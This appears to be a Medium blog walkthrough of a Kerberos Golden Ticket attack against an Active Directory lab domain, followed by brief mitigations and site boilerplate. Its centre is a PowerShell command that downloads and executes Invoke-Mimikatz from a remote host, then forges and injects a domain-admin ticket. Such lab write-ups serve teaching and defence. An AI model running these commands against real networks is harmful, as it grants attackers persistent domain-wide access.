Golden Ticket Attack

Figure 1: Obtained Hash and SID
Figure 2: Failed Access
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command ‘“kerberos::golden /admin:IDontExist23 /domain:plum.local /sid:S-1–5–21–XXXXXXXXX–XXXXXXXXXX–XXXXXXXXXX /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080”’iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command ‘“kerberos::ptt ticket.kirbi”’
Figure 3: Created Golden Ticket
Figure 4: Injected Golden Ticket
Figure 5: Validated Access

Mitigation:

  • Resetting the krbtgt password (twice) to invalidate current golden tickets
  • Review and filter Security Event ID 4624 and 4672

References:

Disclaimer:

--

--

--

Cyber Security Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Creating an AWS Account

AWS Console — Signup Page

10 Cybersecurity Best Practices for Your Commercial Real Estate Business

A Closer Look: Open Enterprise Security Architecture (O-ESA) from the Open Group

Incident Response: Attacker Tools

The Derpcon 2020 information security conference hosted two Capture The Flag (CTF) events.

Understanding File Inclusion Attack using DVWA web application.

Top 5 security issues faced by fintech firms

The attackers are in your network — now what?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mike Bond

Mike Bond

Cyber Security Enthusiast

More from Medium

Advent of Cyber 3: [Day 2] Elf HR Problems

Ctflearn-forensics-writeup

Task 17 [Day 12] Networking Sharing Without Caring(Advent of Cyber 3 2021)

PrintNightmare Writeup